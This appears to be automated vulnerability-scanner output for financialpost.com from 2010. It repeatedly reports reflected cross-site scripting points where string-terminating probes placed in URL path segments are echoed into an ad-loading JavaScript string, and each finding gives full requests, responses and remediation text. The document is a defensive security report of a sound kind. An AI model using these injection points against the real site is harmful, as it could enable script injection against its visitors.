Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news91d79'%3b8edda2a7d69/business-insider/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76139
Expires: Sun, 19 Dec 2010 03:10:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news91d79';8edda2a7d69/business-insider/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news91d79';8edda2a7d69;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83631043?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e64d5'%3be02aad2f8d9 was submitted in the REST URL parameter 2. This input was echoed as e64d5';e02aad2f8d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insidere64d5'%3be02aad2f8d9/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83435
Expires: Sun, 19 Dec 2010 03:10:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insidere64d5';e02aad2f8d9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insidere64d5';e02aad2f8d9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30835417?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bf26'%3b4023866e636 was submitted in the REST URL parameter 4. This input was echoed as 7bf26';4023866e636 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/39879677bf26'%3b4023866e636/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78912
Expires: Sun, 19 Dec 2010 03:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways-nail-first-impression/39879677bf26';4023866e636/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways-nail-first-impression;kw=39879677bf26';4023866e636;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7885c'%3b6d8892f2062 was submitted in the REST URL parameter 5. This input was echoed as 7885c';6d8892f2062 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/3987967/7885c'%3b6d8892f2062 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44327
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb9'%3b332834b26ae was submitted in the REST URL parameter 1. This input was echoed as c7cb9';332834b26ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsc7cb9'%3b332834b26ae/economy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43266
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23396'%3bcca2d7dd2c5 was submitted in the REST URL parameter 2. This input was echoed as 23396';cca2d7dd2c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy23396'%3bcca2d7dd2c5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfab'%3bb5657ebc138 was submitted in the REST URL parameter 1. This input was echoed as 2cfab';b5657ebc138 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2cfab'%3bb5657ebc138/economy/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77584
Expires: Sun, 19 Dec 2010 03:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news2cfab';b5657ebc138/economy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news2cfab';b5657ebc138;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98496123?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4482'%3b595e9a6b3a0 was submitted in the REST URL parameter 2. This input was echoed as e4482';595e9a6b3a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economye4482'%3b595e9a6b3a0/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 90835
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economye4482';595e9a6b3a0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economye4482';595e9a6b3a0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=28719133?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e012'%3bed7a07312f0 was submitted in the REST URL parameter 4. This input was echoed as 2e012';ed7a07312f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/39960152e012'%3bed7a07312f0/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69569
Expires: Sun, 19 Dec 2010 03:10:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:25 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe-north-america/39960152e012';ed7a07312f0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe-north-america;kw=39960152e012';ed7a07312f0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=160 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6b5'%3b2734327df9e was submitted in the REST URL parameter 5. This input was echoed as 5d6b5';2734327df9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/3996015/5d6b5'%3b2734327df9e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38125
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61908'%3b80f0b405c4b was submitted in the REST URL parameter 1. This input was echoed as 61908';80f0b405c4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news61908'%3b80f0b405c4b/energy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36429
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ef9'%3b742404652a1 was submitted in the REST URL parameter 2. This input was echoed as f4ef9';742404652a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energyf4ef9'%3b742404652a1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36392
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96160'%3bf94decf6ed was submitted in the REST URL parameter 1. This input was echoed as 96160';f94decf6ed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news96160'%3bf94decf6ed/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75926
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news96160';f94decf6ed/energy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news96160';f94decf6ed;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50020139?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44511'%3b8f538e1d670 was submitted in the REST URL parameter 2. This input was echoed as 44511';8f538e1d670 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy44511'%3b8f538e1d670/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 89223
Expires: Sun, 19 Dec 2010 03:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy44511';8f538e1d670/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy44511';8f538e1d670;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68677683?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3480f'%3bb1bf66ee4c8 was submitted in the REST URL parameter 4. This input was echoed as 3480f';b1bf66ee4c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/39959423480f'%3bb1bf66ee4c8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70550
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor-deal-with-total-directional-shift-says/39959423480f';b1bf66ee4c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor-deal-with-total-directional-shift-says;kw=39959423480f';b1bf66ee4c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookie ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa269'%3b0b5f135b547 was submitted in the REST URL parameter 5. This input was echoed as aa269';0b5f135b547 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/aa269'%3b0b5f135b547 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
